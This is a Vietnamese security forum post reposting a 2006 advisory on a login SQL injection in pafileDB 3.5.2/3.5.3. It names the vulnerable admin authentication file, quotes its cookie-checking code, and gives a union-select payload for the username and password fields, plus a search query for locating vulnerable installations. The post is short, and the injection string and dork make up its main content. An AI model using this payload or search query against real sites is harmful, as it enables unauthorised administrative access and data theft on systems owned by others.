English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits PafileDB Login SQL Injection  XML
  [Announcement]   PafileDB Login SQL Injection 15/12/2006 02:58:03 (+0700) | #1 | 30520
nhutdm
Elite Member
[Minus]    0    [Plus]
Joined: 02/06/2003 12:40:50
Messages: 45
Offline
[Profile] [PM] [WWW]
# PafileDB Login SQL Injection
# Author : Koray - manyak@mypower.org
# Risk : High
# Class : Remote
# Vulnerable Script : pafileDB
# Version : 3.5.2 / 3.5.3
# Google : powered by pafiledb 3.5.3/2

Vulnerable
include/admin/auth.php

Code
Code:
if (isset($_COOKIE['pafiledb_user']) && isset($_COOKIE['pafiledb_pass'])) { //If the cookie exists, do all this:
    
    $admininfo = array();
    if (checkpass($_COOKIE['pafiledb_user'], $_COOKIE['pafiledb_pass'], $admininfo)) {
        //checkpass() returned true, so the user exists
        
        //$adminloggedin is a var used throughout the script to see if someone's logged in.
        $adminloggedin = true;
        $smarty->assign('admininfo', $admininfo[0]);
        
    } else { //The cookie exists, but the user/pass don't match
...


Username : 1%20union%20select%%20201,2,3,4/*
Password : 1%20union%20select%%20201,2,3,4/* /
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|